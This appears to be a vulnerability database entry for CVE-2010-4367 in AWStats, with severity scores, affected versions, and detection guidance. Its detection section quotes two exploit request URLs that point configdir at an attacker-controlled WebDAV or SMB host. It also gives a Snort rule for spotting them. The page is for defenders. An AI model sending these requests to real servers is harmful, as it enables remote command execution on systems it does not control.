cbcvebase.
CVE-2010-4367
published 2010-12-02

CVE-2010-4367: awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted…

PriorityP268high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
27.67%
97.8th percentile
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.

Affected

38 ranges· showing 25
VendorProductVersion rangeFixed in
awstatsawstats<= 6.95
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats
awstatsawstats

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
urlhttp://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share
path/cgi-bin/awstats.cgi
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt"; flow:established,to_server; http.uri; content:"awstats.cgi"; nocase; content:"config="; nocase; content:"pluginmode=rawlog"; nocase; content:"configdir=|5C 5C|"; nocase; fast_pattern; reference:bid,45123; reference:cve,2010-4367; classtype:web-application-attack; sid:2012393; rev:4; metadata:created_at 2011_03_01, cve CVE_2010_4367, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_13;)
bytes
|5C 5C|
  • Look for HTTP requests to awstats.cgi containing both 'pluginmode=rawlog' and 'configdir=\\' (UNC path prefix, bytes 5C 5C) in the URI — this is the canonical exploit pattern for CVE-2010-4367 targeting WebDAV/SMB shares.
  • The attack requires three URL parameters to be present simultaneously: config=<arbitrary>, pluginmode=rawlog, and configdir=\\<attacker-controlled-host>\<share>. Alerting on any URI containing all three is high-fidelity.
  • Two distinct transport variants exist: WebDAV over port 80 (configdir=\\host:80\webdav) targeting Windows XP + Apache Tomcat, and SMB (configdir=\\host\share) targeting Windows 2003/XP. Monitor for both UNC path styles in web server logs.
  • ·Exploitation is primarily Windows-specific (WebDAV/SMB UNC paths). On Linux, the attack is not straightforwardly reproducible without non-default automount configuration, making the impact significantly lower on Linux deployments.
  • ·The Emergingthreats Snort rule (sid:2012393) specifically targets the UNC-path variant of the exploit; Linux-based configdir path traversal attacks (local filesystem) would not be caught by this signature alone.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.